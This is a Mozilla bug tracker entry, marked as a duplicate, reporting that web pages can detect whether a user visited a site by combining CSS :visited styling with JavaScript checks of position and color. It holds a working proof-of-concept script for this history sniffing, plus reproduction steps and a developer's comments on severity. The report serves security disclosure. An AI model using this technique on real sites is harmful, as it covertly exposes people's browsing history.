Closed Bug 127041 Opened 22 years ago Closed 22 years ago

possible to check if a site has been visited

Categories

(Core :: Security, defect)

defect
Not set
normal

Tracking

()

VERIFIED DUPLICATE of bug 57351

People

(Reporter: bugzilla, Assigned: security-bugs)

References

()

Details

I'm not sure if this is a bug a bug or not, but I found this on bugtraq.

1) Clear Mozilla browser history
2) visit http://gemal.dk/browserspy/css-moz.html
3) visit http://mozilla.org
4) visit http://gemal.dk/browserspy/css-moz.html

the page can tell if you visited http://mozilla.org

done via style sheet and visited
div class="normal">
<a id="j" href="http://mozilla.org/">&nbsp;</a>
<style>
#j { position: absolute; top: 0; }
#j:visited { top: 100px; color: #660001; }
</style>
<script>
var j=document.getElementById('j');
var v=0;
if (j && 'offsetTop' in j)
  if (j.offsetTop == 100)
    v=1;
if (j && 'currentStyle' in j && 'color' in j.currentStyle)
  if (j.currentStyle.color == '#660001')
    v=1;

if (v)
  document.writeln('You have been visiting mozilla.org lately! That very good!
Now clear your browsers history and reload!');
else
  document.writeln('You haven\'t been visiting mozilla.org lately. Go ahead <a
href="http://mozilla.org/">mozilla.org</a> and then come back...');
</script>
Essentially the same issue as 57351, which is still assigned to me but I may
WONTFIX it. I just can't think of a way to solve it without getting rid of the
"visited" rule in CSS. Henrik, can you give us a link to the Bugtraq post?

In any case, the information leakage involved here is pretty limited. *please*
give me your thoughts on the severity of this problem. 

*** This bug has been marked as a duplicate of 57351 ***
Status: NEW → RESOLVED
Closed: 22 years ago
Resolution: --- → DUPLICATE
Verified.
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.